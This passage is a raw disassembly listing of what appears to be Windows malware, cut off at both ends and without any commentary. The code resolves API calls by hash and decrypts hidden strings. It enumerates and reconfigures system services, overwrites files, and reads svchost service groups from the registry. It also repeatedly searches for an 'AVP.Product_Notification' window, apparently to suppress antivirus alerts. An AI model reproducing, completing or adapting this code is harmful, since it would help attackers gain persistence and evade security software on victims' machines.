loc_401B4A: ; CODE XREF: sub_401B08+3C�j
push 104h
push [ebp+var_4]
push eax
push ds:dword_401B46
push offset byte_4013A9
call sub_4011F2
call eax
mov eax, [ebp+var_4]
leave
retn
sub_401B08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B6A proc near ; CODE XREF: sub_401D9E+30A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
call sub_401B08
mov [ebp+var_8], eax
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+var_8]
push ds:dword_401A34
push offset byte_4013A9
call sub_4011F2
call eax
cmp eax, 0FFFFFFFFh
jz loc_401C88
mov [ebp+var_4], eax
push 0
push [ebp+var_4]
push ds:dword_401A6D
push offset byte_4013A9
call sub_4011F2
call eax
mov [ebp+var_C], eax
push [ebp+var_C]
push 40h
push ds:dword_40189E
push offset byte_4013A9
call sub_4011F2
call eax
mov [ebp+var_10], eax
push 0
push offset dword_405000
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push ds:dword_401AB4
push offset byte_4013A9
call sub_4011F2
call eax
push [ebp+var_4]
push ds:dword_4014ED
push offset byte_4013A9
call sub_4011F2
call eax
push 0
push 80h
push 5
push 0
push 3
push 0C0000000h
push [ebp+arg_0]
push ds:dword_401A34
push offset byte_4013A9
call sub_4011F2
call eax
or eax, eax
jz short loc_401C83
mov [ebp+var_4], eax
jmp short loc_401C4A
; ---------------------------------------------------------------------------
dword_401C46 dd 50044C90h ; sub_401C8F+4B�r
; ---------------------------------------------------------------------------
loc_401C4A: ; CODE XREF: sub_401B6A+DA�j
push 0
push offset dword_405000
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push ds:dword_401C46
push offset byte_4013A9
call sub_4011F2
call eax
push [ebp+var_4]
push ds:dword_4014ED
push offset byte_4013A9
call sub_4011F2
call eax
jmp short locret_401C8B
; ---------------------------------------------------------------------------
loc_401C83: ; CODE XREF: sub_401B6A+D5�j
push 0
pop eax
jmp short locret_401C8B
; ---------------------------------------------------------------------------
loc_401C88: ; CODE XREF: sub_401B6A+38�j
push 0
pop eax
locret_401C8B: ; CODE XREF: sub_401B6A+117�j
; sub_401B6A+11C�j
leave
retn 4
sub_401B6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C8F proc near ; CODE XREF: sub_401D9E+360�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push 0
push 80h
push 5
push 0
push 3
push 40000000h
push [ebp+arg_0]
push ds:dword_401A34
push offset byte_4013A9
call sub_4011F2
call eax
cmp eax, 0FFFFFFFFh
jz short loc_401D08
mov [ebp+var_4], eax
push 0
push offset dword_405000
push dword_405EE0
push dword_405EDC
push [ebp+var_4]
push ds:dword_401C46
push offset byte_4013A9
call sub_4011F2
call eax
push [ebp+var_4]
push ds:dword_4014ED
push offset byte_4013A9
call sub_4011F2
call eax
mov eax, 1
jmp short locret_401D0D
; ---------------------------------------------------------------------------
loc_401D08: ; CODE XREF: sub_401C8F+30�j
mov eax, 0
locret_401D0D: ; CODE XREF: sub_401C8F+77�j
leave
retn 4
sub_401C8F endp
; =============== S U B R O U T I N E =======================================
sub_401D11 proc near ; CODE XREF: sub_401D9E+119�p
; sub_401D9E+29D�p
jmp short loc_401D17
; ---------------------------------------------------------------------------
dword_401D13 dd 0D4D43052h ; sub_401D11+60�r
; ---------------------------------------------------------------------------
loc_401D17: ; CODE XREF: sub_401D11�j
push offset dword_405000
push 4
push offset dword_405EB0
push dword_405EAC
push ds:dword_401D13
push offset dword_401750
call sub_4011F2
call eax
push dword_405000
push 40h
push ds:dword_40189E
push offset byte_4013A9
call sub_4011F2
call eax
mov dword_405EB0, eax
push offset dword_405000
push dword_405000
push dword_405EB0
push dword_405EAC
push ds:dword_401D13
push offset dword_401750
call sub_4011F2
call eax
push dword_405EB0
pop edi
mov eax, [edi+0Ch]
push eax
pop dword_405EB8
mov eax, [edi]
push eax
pop dword_405ED8
retn
sub_401D11 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D9E proc near ; CODE XREF: start:loc_4033E1�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
jmp short loc_401DAA
; ---------------------------------------------------------------------------
dword_401DA6 dd 698CCAB5h ; sub_40278E+9�r
; ---------------------------------------------------------------------------
loc_401DAA: ; CODE XREF: sub_401D9E+6�j
push 4
push 0
push 0
push ds:dword_401DA6
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jz locret_402143
push eax
pop dword_405E94
jmp short loc_401DD7
; ---------------------------------------------------------------------------
dword_401DD3 dd 0E2940E0Eh ; sub_401D9E+A9�r
; ---------------------------------------------------------------------------
loc_401DD7: ; CODE XREF: sub_401D9E+33�j
push 0
push offset dword_405EA0
push offset dword_405E9C
push 4
push offset dword_405E98
push 3
push 30h
push dword_405E94
push ds:dword_401DD3
push offset dword_401750
call sub_4011F2
call eax
push dword_405E9C
push 40h
push ds:dword_40189E
push offset byte_4013A9
call sub_4011F2
call eax
mov dword_405E98, eax
push 0
push offset dword_405EA0
push offset dword_405E9C
push dword_405E9C
push dword_405E98
push 3
push 30h
push dword_405E94
push ds:dword_401DD3
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jz loc_402125
push dword_405E98
pop edi
mov ecx, dword_405EA0
loc_401E6E: ; CODE XREF: sub_401D9E+381�j
push edi
push ecx
mov eax, [edi]
push eax
pop dword_405EA4
mov eax, [edi+4]
mov dword_405EA8, eax
jmp short loc_401E87
; ---------------------------------------------------------------------------
dword_401E83 dd 0DB166923h ; sub_401D9E+27C�r ...
; ---------------------------------------------------------------------------
loc_401E87: ; CODE XREF: sub_401D9E+E3�j
push 0F01FFh
push dword_405EA4
push dword_405E94
push ds:dword_401E83
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jz loc_40200C
mov dword_405EAC, eax
call sub_401D11
call sub_401B08
mov [ebp+var_4], eax
jmp short loc_401ECA
; ---------------------------------------------------------------------------
dword_401EC6 dd 0B0E3D59h ; sub_401D9E+220�r
; ---------------------------------------------------------------------------
loc_401ECA: ; CODE XREF: sub_401D9E+126�j
push dword_405EA4
push 0
push 0
push 0
push 0
push 0
push [ebp+var_4]
push 0FFFFFFFFh
push 0FFFFFFFFh
push 110h
push dword_405EAC
push ds:dword_401EC6
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jz loc_40200C
jmp short loc_401F0C
; ---------------------------------------------------------------------------
dword_401F08 dd 0C6449C9Bh ; sub_40278E+6D�r
; ---------------------------------------------------------------------------
loc_401F0C: ; CODE XREF: sub_401D9E+168�j
push offset dword_405EBC
push 1
push dword_405EAC
push ds:dword_401F08
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jz short loc_401F70
loc_401F2F: ; CODE XREF: sub_401D9E+1D0�j
push 0Ah
push ds:dword_4016D4
push offset byte_4013A9
call sub_4011F2
call eax
jmp short loc_401F49
; ---------------------------------------------------------------------------
dword_401F45 dd 0D103D37Bh ; ---------------------------------------------------------------------------
loc_401F49: ; CODE XREF: sub_401D9E+1A5�j
push offset dword_405EBC
push dword_405EAC
push ds:dword_401F45
push offset dword_401750
call sub_4011F2
call eax
mov eax, dword_405EC0
cmp eax, 1
jnz short loc_401F2F
loc_401F70: ; CODE XREF: sub_401D9E+18F�j
jmp short loc_401F76
; ---------------------------------------------------------------------------
dword_401F72 dd 0BFC6E5E1h ; sub_401D9E+31E�r
; ---------------------------------------------------------------------------
loc_401F76: ; CODE XREF: sub_401D9E:loc_401F70�j
push 0
push 0
push dword_405EAC
push ds:dword_401F72
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jz short loc_401F98
jmp short loc_40200C
; ---------------------------------------------------------------------------
loc_401F98: ; CODE XREF: sub_401D9E+1F6�j
push dword_405EA4
push 0
push 0
push 0
push 0
push 0
push dword_405EB8
push 0FFFFFFFFh
push 0FFFFFFFFh
push dword_405ED8
push dword_405EAC
push ds:dword_401EC6
push offset dword_401750
call sub_4011F2
call eax
push 9C4h
push ds:dword_4016D4
push offset byte_4013A9
call sub_4011F2
call eax
call sub_401896
or eax, eax
jnz short loc_401FF2
jmp short loc_40200C
; ---------------------------------------------------------------------------
loc_401FF2: ; CODE XREF: sub_401D9E+250�j
jmp short loc_401FF8
; ---------------------------------------------------------------------------
dword_401FF4 dd 10A0959Fh ; sub_401D9E+367�r ...
; ---------------------------------------------------------------------------
loc_401FF8: ; CODE XREF: sub_401D9E:loc_401FF2�j
push 0
push ds:dword_401FF4
push offset byte_4013A9
call sub_4011F2
call eax
loc_40200C: ; CODE XREF: sub_401D9E+10E�j
; sub_401D9E+162�j ...
push 15h
push dword_405EA4
push dword_405E94
push ds:dword_401E83
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jz loc_402117
push eax
pop dword_405EAC
call sub_401D11
push 0
push 80h
push 3
push 0
push 3
push 0C0000000h
push dword_405EB8
push ds:dword_401A34
push offset byte_4013A9
call sub_4011F2
call eax
cmp eax, 0FFFFFFFFh
jz loc_402117
push eax
pop dword_405EB4
push dword_405EB4
push ds:dword_4014ED
push offset byte_4013A9
call sub_4011F2
call eax
push dword_405EB8
call sub_401A2C
cmp eax, 1
jnz short loc_402117
push dword_405EB8
call sub_401B6A
cmp eax, 1
jnz short loc_402117
push 0
push 0
push dword_405EAC
push ds:dword_401F72
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jnz short loc_4020F6
push 0FAh
push ds:dword_4016D4
push offset byte_4013A9
call sub_4011F2
call eax
call sub_401896
or eax, eax
jnz short loc_4020F8
jmp short loc_402117
; ---------------------------------------------------------------------------
jmp short loc_4020F8
; ---------------------------------------------------------------------------
loc_4020F6: ; CODE XREF: sub_401D9E+332�j
jmp short loc_402117
; ---------------------------------------------------------------------------
loc_4020F8: ; CODE XREF: sub_401D9E+352�j
; sub_401D9E+356�j
push dword_405EB8
call sub_401C8F
push 0
push ds:dword_401FF4
push offset byte_4013A9
call sub_4011F2
call eax
loc_402117: ; CODE XREF: sub_401D9E+290�j
; sub_401D9E+2CF�j ...
pop ecx
pop edi
add edi, 24h
dec ecx
or ecx, ecx
jnz loc_401E6E
loc_402125: ; CODE XREF: sub_401D9E+BD�j
jmp short loc_40212B
; ---------------------------------------------------------------------------
dword_402127 dd 0F2C2BE3h ; sub_40278E+A3�r
; ---------------------------------------------------------------------------
loc_40212B: ; CODE XREF: sub_401D9E:loc_402125�j
push dword_405E94
push ds:dword_402127
push offset dword_401750
call sub_4011F2
call eax
locret_402143: ; CODE XREF: sub_401D9E+26�j
leave
retn
sub_401D9E endp
; ---------------------------------------------------------------------------
dword_402145 dd 5F3ACBEDh ; sub_4025DD+111�r
byte_402149 db 0, 0Bh, 0 ; DATA XREF: sub_4025DD+56�o
; sub_4025DD:loc_402702�o ...
dd 1F6C076Ah, 7114BED7h, 0F396572Fh, 557B5033h, 47C2247h
db 0D6h, 0B3h
dw 700h ; DATA XREF: sub_4025DD+7C�o
dd 0AD4B6B00h, 5E7B0A82h, 9ED0F030h, 126AB1h, 0E7A6000Fh
dd 0C5950157h, 8ACB240Ah, 2B4E462Ah, 5327E795h, 0ACC57337h
dd 345896F7h, 5136E58Ah, 5C001800h, 6D6F391Dh, 31301E3Dh
dd 6E95E761h, 215C3801h, 58DFBC54h, 18DF802Ch, 37395656h
dd 425A3343h, 58F99024h, 0CADCC3Bh, 46EE8778h
db 29h, 7, 69h
db 0 ; DATA XREF: sub_402281+3�o
; sub_40242A+E�o
dd 72210033h, 8BCDDA95h, 3A6DB4E0h, 0ABF91958h, 411DD693h
dd 7E17E6ABh, 0E99BFE9Dh, 0C2B1C5AAh, 0F395D6B9h, 0CA96C6B2h
dd 9FF6B4E3h, 0ABCF305Eh, 9CEB3758h, 0F5A9F98Ah, 0ABDED192h
dd 0C3B12052h, 137D2A4Fh, 0E4B26713h, 0C1B3EE8Bh, 0D0B91B68h
dd 0C3ADEF80h, 4510712Dh, 0BFD6C2ACh, 3645107Eh, 0B8D9BECAh
dd 4F23D4B8h
dword_402230 dd 0D6000D00h, 76F7A583h, 0DE3B63Ah, 9407637Dh, 0E93F4BF5h
; DATA XREF: sub_402281+A8�o
dd 2EC8818Ch, 280B6D40h
db 47h
byte_40224D db 0, 6, 0 ; DATA XREF: sub_402281+E8�o
dd 0D1A1D9AAh, 0B4C68DE8h, 0E388B9CAh
dd 0C8000F00h, 0D93FD9Dh, 59D1BF64h, 0E03F4B2Ah, 280E6281h
; DATA XREF: sub_402281+115�o
dd 0EE386B44h, 0BCCE9Ah, 23375969h
db 44h
; ---------------------------------------------------------------------------
loc_40227D: ; DATA XREF: sub_402281:loc_4022B0�o
pop esp
add [ebx+0], bh ; DATA XREF: sub_402281+156�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402281 proc near ; CODE XREF: sub_40242A+97�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push offset byte_4021C7
call sub_401380
push offset aSvchost_exe ; "svchost.exe "
push offset byte_4063E9
push ds:dword_401724
push offset byte_4013A9
call sub_4011F2
call eax
jmp short loc_4022B0
; ---------------------------------------------------------------------------
dword_4022AC dd 0F3FFD0D6h ; sub_402281+53�r ...
; ---------------------------------------------------------------------------
loc_4022B0: ; CODE XREF: sub_402281+29�j
push offset loc_40227D
push offset byte_4063E9
push ds:dword_4022AC
push offset byte_4013A9
call sub_4011F2
call eax
push [ebp+arg_0]
push offset byte_4063E9
push ds:dword_4022AC
push offset byte_4013A9
call sub_4011F2
call eax
push offset dword_406D19
push 20019h
push 0
push offset byte_4063E9
push 80000002h
push ds:dword_4018D1
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jnz loc_40240E
push 400h
pop dword_406F1D
push 1
pop dword_406F21
push offset dword_402230
call sub_401380
push offset dword_406F1D
push offset byte_4063E9
push offset dword_406F21
push 0
push offset aSvchost_exe ; "svchost.exe "
push dword_406D19
push ds:dword_40191D
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jnz loc_40240E
push offset byte_40224D
call sub_401380
push offset byte_4063E9
push offset aSvchost_exe ; "svchost.exe "
call sub_4013A4
cmp eax, 0
jbe loc_40240E
push 200h
pop dword_406F1D
push offset dword_40225C
call sub_401380
push offset dword_406F1D
push offset byte_4063E9
push offset dword_406F21
push 0
push offset aSvchost_exe ; "svchost.exe "
push dword_406D19
push ds:dword_40191D
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jnz short loc_40240E
push offset byte_4063E9
push (offset loc_40227E+1)
call sub_4013A4
cmp eax, 0
jbe short loc_40240E
add eax, offset byte_4063E9
dec eax
push 64h
push eax
push offset byte_406BE9
push ds:dword_401409
push offset byte_4013A9
call sub_4011F2
call eax
push 1
pop dword_406F25
loc_40240E: ; CODE XREF: sub_402281+8F�j
; sub_402281+E2�j ...
push dword_406D19
push ds:dword_4014ED
push offset byte_4013A9
call sub_4011F2
call eax
leave
retn 4
sub_402281 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40242A proc near ; CODE XREF: sub_4025DD+44�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push 0
pop dword_406F25
push offset byte_4021C7
call sub_401380
push offset dword_406D15
push 20019h
push 0
push offset aSvchost_exe ; "svchost.exe "
push 80000002h
push ds:dword_4018D1
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jnz short loc_4024CC
push 0
pop [ebp+var_4]
loc_402473: ; CODE XREF: sub_40242A+A0�j
push 200h
pop dword_406F1D
jmp short loc_402484
; ---------------------------------------------------------------------------
dword_402480 dd 0A85017Dh ; ---------------------------------------------------------------------------
loc_402484: ; CODE XREF: sub_40242A+54�j
push 0
push 0
push 0
push 0
push offset dword_406F1D
push offset byte_406D1D
push [ebp+var_4]
push dword_406D15
push ds:dword_402480
push offset dword_401750
call sub_4011F2
call eax
push eax
pop [ebp+var_8]
or eax, eax
jnz short loc_4024C6
inc [ebp+var_4]
push offset byte_406D1D
call sub_402281
loc_4024C6: ; CODE XREF: sub_40242A+8D�j
cmp [ebp+var_8], 0
jz short loc_402473
loc_4024CC: ; CODE XREF: sub_40242A+42�j
push dword_406D15
push ds:dword_4014ED
push offset byte_4013A9
call sub_4011F2
call eax
leave
retn
sub_40242A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024E6 proc near ; DATA XREF: .text:00402585�o
; .text:004025AF�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
jmp short loc_4024F4
; ---------------------------------------------------------------------------
byte_4024EB db 0 ; DATA XREF: sub_4024E6+27�o
; sub_4024E6+71�o ...
dd 0E9D306A6h, 0A895DB0Fh
; ---------------------------------------------------------------------------
loc_4024F4: ; CODE XREF: sub_4024E6+3�j
jmp short loc_4024FA
; ---------------------------------------------------------------------------
dword_4024F6 dd 0A94624Bh ; ---------------------------------------------------------------------------
loc_4024FA: ; CODE XREF: sub_4024E6:loc_4024F4�j
push 400h
push offset byte_4067E9
push [ebp+arg_0]
push ds:dword_4024F6
push offset byte_4024EB
call sub_4011F2
call eax
jmp short loc_40251F
; ---------------------------------------------------------------------------
dword_40251B dd 0F90397BEh ; ---------------------------------------------------------------------------
loc_40251F: ; CODE XREF: sub_4024E6+33�j
push offset aAvp_product_no ; "AVP.Product_Notification"
push offset byte_4067E9
push ds:dword_40251B
push offset byte_4013A9
call sub_4011F2
call eax
or eax, eax
jnz short loc_402563
jmp short loc_402545
; ---------------------------------------------------------------------------
dword_402541 dd 0D2773E02h ; ---------------------------------------------------------------------------
loc_402545: ; CODE XREF: sub_4024E6+59�j
push 0
push 0
push 82h
push [ebp+arg_0]
push ds:dword_402541
push offset byte_4024EB
call sub_4011F2
call eax
loc_402563: ; CODE XREF: sub_4024E6+57�j
mov eax, 1
leave
retn 8
sub_4024E6 endp
; ---------------------------------------------------------------------------
loc_40256C: ; CODE XREF: .text:004025DA�j
; DATA XREF: sub_4025DD+F�o
push 64h
push offset aAvp_product_no ; "AVP.Product_Notification"
push 402173h
call sub_401357
jmp short loc_402583
; ---------------------------------------------------------------------------
dword_40257F dd 0D34BD4ECh ; .text:004025B4�r
; ---------------------------------------------------------------------------
loc_402583: ; CODE XREF: .text:0040257D�j
push 0
push offset sub_4024E6
push ds:dword_40257F
push offset byte_4024EB
call sub_4011F2
call eax
push 64h
push offset aAvp_product_no ; "AVP.Product_Notification"
push 402194h
call sub_401357
push 0
push offset sub_4024E6
push ds:dword_40257F
push offset byte_4024EB
call sub_4011F2
call eax
push 32h
push ds:dword_4016D4
push offset byte_4013A9
call sub_4011F2
call eax
jmp short loc_40256C
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4025DD proc near ; CODE XREF: start+15�p
jmp short loc_4025E3
; ---------------------------------------------------------------------------
dword_4025DF dd 0ED4013h ; sub_402CFD+16F�r ...
; ---------------------------------------------------------------------------
loc_4025E3: ; CODE XREF: sub_4025DD�j
push offset dword_406F21
push 0
push 0
push offset loc_40256C
push 0
push 0
push ds:dword_4025DF
push offset byte_4013A9
call sub_4011F2
call eax
push ds:dword_402145
pop eax
xor eax, 0BCh
push eax
call sub_40147D
or eax, eax
jz locret_40277A
call sub_40242A
cmp dword_406F25, 1
jnz locret_40277A
push offset byte_402149
call sub_401380
push offset aSvchost_exe ; "svchost.exe "
push offset byte_4063E9
push ds:dword_401724
push offset byte_4013A9
call sub_4011F2
call eax
push offset word_402162
call sub_401380
push offset aSvchost_exe ; "svchost.exe "
push offset byte_4063E9
push ds:dword_4022AC
push offset byte_4013A9
call sub_4011F2
call eax
push offset byte_406BE9
push offset byte_4063E9
push ds:dword_4022AC
push offset byte_4013A9
call sub_4011F2
call eax
mov dword_406F29, 44h
jmp short loc_4026AB
; ---------------------------------------------------------------------------
dword_4026A7 dd 0C90CA6C0h ; sub_402CFD+140�r ...
; ---------------------------------------------------------------------------
loc_4026AB: ; CODE XREF: sub_4025DD+C8�j
push offset byte_406F6D
push offset dword_406F29
push 0
push 0
push 0
push 0
push 0
push 0
push offset byte_4063E9
push 0
push ds:dword_4026A7
push offset byte_4013A9
call sub_4011F2
call eax
loc_4026DA: ; CODE XREF: sub_4025DD+123�j
push 2
push ds:dword_4016D4
push offset byte_4013A9
call sub_4011F2
call eax
push ds:dword_402145
pop eax
xor eax, 7Ah
push eax
call sub_40147D
or eax, eax
jnz short loc_4026DA
loc_402702: ; CODE XREF: sub_4025DD+19B�j
push offset byte_402149
call sub_401380
push offset aSvchost_exe ; "svchost.exe "
call sub_401000
push eax
call sub_40147D
push eax
push 0
push 1
push ds:dword_40181E
push offset byte_4013A9
call sub_4011F2
call eax
push 0
push eax
push ds:dword_401840
push offset byte_4013A9
call sub_4011F2
call eax
push 2
push ds:dword_4016D4
push offset byte_4013A9
call sub_4011F2
call eax
push offset byte_402149
call sub_401380
push offset aSvchost_exe ; "svchost.exe "
call sub_401000
push eax
call sub_40147D
or eax, eax
jnz short loc_402702
locret_40277A: ; CODE XREF: sub_4025DD+3E�j
; sub_4025DD+50�j
retn
sub_4025DD endp
; ---------------------------------------------------------------------------
byte_40277B db 0 ; DATA XREF: sub_40278E+28�o
dd 0FDB00008h, 7427DBB8h, 573E620Ah, 9FF30461h
db 7Ah, 1Eh
; =============== S U B R O U T I N E =======================================
sub_40278E proc near ; CODE XREF: start+5�p
push 0F003Fh
push 0
push 0
push ds:dword_401DA6
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jz locret_402843
mov dword_405EAC, eax
push offset byte_40277B
call sub_401380
nop
push 0F01FFh
push offset aSvchost_exe ; "svchost.exe "
push dword_405EAC
push ds:dword_401E83
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jz short loc_40282B
push eax
pop dword_406F7D
push offset byte_406F81
push 1
push dword_406F7D
push ds:dword_401F08
push offset dword_401750
call sub_4011F2
call eax
jmp short loc_402813
; ---------------------------------------------------------------------------
dword_40280F dd 0E17961CDh ; ---------------------------------------------------------------------------
loc_402813: ; CODE XREF: sub_40278E+7F�j
push dword_406F7D
push ds:dword_40280F
push offset dword_401750
call sub_4011F2
call eax
loc_40282B: ; CODE XREF: sub_40278E+57�j
push dword_405EAC
push ds:dword_402127
push offset dword_401750
call sub_4011F2
call eax
locret_402843: ; CODE XREF: sub_40278E+1D�j
retn
sub_40278E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402844 proc near ; CODE XREF: sub_40287E+2C�p
; sub_40287E+90�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
pusha
mov edi, [ebp+arg_0]
mov ebx, 0
mov ecx, 0
mov eax, [ebp+arg_4]
loc_40285B: ; CODE XREF: sub_402844+2D�j
xor cl, [edi]
xor bl, [edi]
jmp short loc_402864
; ---------------------------------------------------------------------------
loc_402861: ; CODE XREF: sub_402844+23�j
sub cl, 20h
loc_402864: ; CODE XREF: sub_402844+1B�j
cmp cl, 20h
jnb short loc_402861
rol ebx, cl
inc edi
mov dl, [edi]
dec eax
or eax, eax
jnz short loc_40285B
mov [ebp+var_4], ebx
popa
mov eax, [ebp+var_4]
leave
retn 8
sub_402844 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40287E proc near ; CODE XREF: sub_402928+F9�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_15 = byte ptr -15h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFDCh
pusha
push 11h
push offset byte_406FA1
call sub_401038
push [ebp+arg_0]
push ds:dword_4013B6
push offset byte_4013A9
call sub_4011F2
call eax
push eax
push [ebp+arg_0]
call sub_402844
mov [ebp+var_24], eax
push offset byte_406FA1
push [ebp+var_24]
call sub_4033F8
lea eax, [ebp+var_15]
mov [ebp+var_1C], eax
push 0Fh
push [ebp+var_1C]
call sub_401038
mov [ebp+var_20], 10h
lea eax, [ebp+var_20]
jmp short loc_4028DF
; ---------------------------------------------------------------------------
dword_4028DB dd 8214FC22h ; ---------------------------------------------------------------------------
loc_4028DF: ; CODE XREF: sub_40287E+5B�j
push eax
push [ebp+var_1C]
push ds:dword_4028DB
push offset byte_4013A9
call sub_4011F2
call eax
push [ebp+var_1C]
push ds:dword_4013B6
loc_4028FE: ; CODE XREF: sub_402928+31�j
push offset byte_4013A9
call sub_4011F2
call eax
push eax
push [ebp+var_1C]
call sub_402844
lea ebx, byte_406FA1
add ebx, 8
push ebx
push eax
call sub_4033F8
popa
leave
retn 4
sub_40287E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402928 proc near ; CODE XREF: sub_402EB4+C3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push 19000h
push 40h
push ds:dword_40189E
push offset byte_4013A9
call sub_4011F2
call eax
mov dword_406FF2, eax
lea ebx, [ebp+var_4]
jmp short loc_402982
; ---------------------------------------------------------------------------
loc_402951: ; DATA XREF: sub_402928:loc_402982�o
wait
sub al, 0C8h
and edi, edi
mov dl, 0CCh
das
jmp short loc_4028FE
; ---------------------------------------------------------------------------
db 0C7h
dd 0E985D023h, 0FD89CA01h, 0F2B1E51Ah, 0EC89DD00h, 0CFA8991Dh
dd 0E993FA32h, 0EF88DC1Ch, 0E894DC38h, 0B588D607h
; ---------------------------------------------------------------------------
inc eax
xchg eax, edi
loc_402982: ; CODE XREF: sub_402928+27�j
lea eax, loc_402951
push eax
call sub_40118F
push ebx
push 20019h
push 0
push eax
push 80000002h
push ds:dword_4018D1
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jnz short loc_402A18
mov [ebp+var_8], 19000h
lea ebx, [ebp+var_8]
jmp short loc_4029D0
; ---------------------------------------------------------------------------
word_4029BE dw 10D2h ; DATA XREF: sub_402928:loc_4029D0�o
dd 0DD4A2296h, 0E4412AA6h, 0C14924A0h, 0D0643FB1h
; ---------------------------------------------------------------------------
loc_4029D0: ; CODE XREF: sub_402928+94�j
lea eax, word_4029BE
push eax
call sub_40118F
push ebx
push dword_406FF2
push 0
push 0
push eax
push [ebp+var_4]
push ds:dword_40191D
push offset dword_401750
call sub_4011F2
call eax
jmp short loc_402A03
; ---------------------------------------------------------------------------
dword_4029FF dd 2F4A8A22h ; ---------------------------------------------------------------------------
loc_402A03: ; CODE XREF: sub_402928+D5�j
push [ebp+var_4]
push ds:dword_4029FF
push offset dword_401750
call sub_4011F2
call eax
loc_402A18: ; CODE XREF: sub_402928+88�j
mov eax, dword_406FF2
add eax, 8
push eax
call sub_40287E
leave
retn
sub_402928 endp
; ---------------------------------------------------------------------------
dword_402A28 dd 0F4002100h, 6C5A2E9Ch, 0D6017118h, 265A75ECh, 0D8A3C409h
; DATA XREF: sub_402EB4+EC�o
dd 471C7DB7h, 165C3534h, 8AB0D338h, 0ED5D72E4h, 0EB274280h
dd 0F806678Ch, 0A7BBD7D7h, 135F3EC0h, 39B9DC67h, 5A156517h
dd 5DAFDF32h, 2AE98762h
db 17h
byte_402A6D db 0, 23h, 0 ; DATA XREF: sub_402EB4+240�o
; ---------------------------------------------------------------------------
stosd
retn
; ---------------------------------------------------------------------------
dw 7B0Fh
db 90h
db 0E4h, 1Dh, 6Dh
dd 0A48B764Ch, 651283ACh, 394E780Fh, 57226648h, 7C130F7Fh
dd 0C4AB610Fh, 0BCD60668h, 254782EDh, 0B7D4F8D6h, 0FBD4600Eh
dd 0E9877F16h, 0D6EF1DFh, 0C4ADD5B2h, 5F6F340Bh, 71424878h
db 7Eh, 4Ch
word_402AB6 dw 800h ; DATA XREF: sub_402EB4+27�o
dd 74147500h, 65F68010h, 0F02B5B04h, 2AD6E599h
db 18h
db 0, 6, 0 ; DATA XREF: sub_402EB4�o
dd 97A4B3Eh, 97B492Ch, 0EFDD4B78h
dword_402AD8 dd 51000600h, 0A7314324h, 914825CBh db 0FEh, 0AFh, 0C1h
byte_402AE7 db 0 ; DATA XREF: start+55�o
dd 0D5A6000Ch, 566E99Fh, 0FD924129h, 0FA8EA5D6h, 0A0C5715Fh
dd 6104EE96h
db 3Dh, 1Dh
word_402B02 dw 2Eh ; DATA XREF: sub_402CFD+2F�o
byte_402B04 db 0FFh ; DATA XREF: sub_402C03+46�r
db 3 dup(0FFh)
dd 9 dup(0FFFFFFFFh), 3EFFFFFFh, 3FFFFFFFh, 37363534h
dd 3B3A3938h, 0FFFF3D3Ch, 0FFFF00FFh, 20100FFh, 6050403h
dd 0A090807h, 0E0D0C0Bh, 1211100Fh, 16151413h, 0FF191817h
dd 0FFFFFFFFh, 1C1B1AFFh, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 0FF333231h, 20h dup(0FFFFFFFFh)
db 3 dup(0FFh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C03 proc near ; CODE XREF: sub_402EB4+12C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
pusha
push [ebp+arg_0]
push ds:dword_4013B6
push offset byte_4013A9
call sub_4011F2
call eax
mov [ebp+var_4], eax
or eax, eax
jnz short loc_402C2F
mov eax, 0FFFFFFFFh
leave
retn 8
; ---------------------------------------------------------------------------
loc_402C2F: ; CODE XREF: sub_402C03+21�j
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
